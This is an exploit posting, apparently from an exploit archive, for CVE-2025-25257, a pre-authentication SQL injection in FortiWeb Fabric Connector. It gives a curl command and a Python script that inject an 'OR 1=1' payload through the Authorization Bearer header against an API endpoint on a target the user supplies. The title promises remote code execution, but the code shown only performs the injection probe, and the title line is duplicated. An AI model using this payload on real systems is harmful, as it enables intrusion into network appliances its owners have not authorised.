FortiWeb Fabric Connector 7.6.x SQL Injection

# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
Injection # Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: This email address is being protected from spambots. You need JavaScript enabled to view it.
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257

Overview

CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
This flaw allows attackers to inject malicious SQL commands into the
vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).


PoC

curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
https://<fortiweb-ip>/api/fabric/device/status

PoC Python

import requests

def test_sqli(base_url):
url = f"{base_url}/api/fabric/device/status"
headers = {
"Authorization": "Bearer aaa' OR '1'='1"
}
try:
response = requests.get(url, headers=headers, verify=False,
timeout=10)
print(f"Status code: {response.status_code}")
print("Response body:")
print(response.text)
except Exception as e:
print(f"Error: {e}")

if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL
CVE-2025-25257 FortiWeb")
parser.add_argument("base_url", help="Base URL of FortiWeb (ex:
https://10.0.0.5)")
args = parser.parse_args()
test_sqli(args.base_url)
# python3 src/poc.py https://10.0.0.5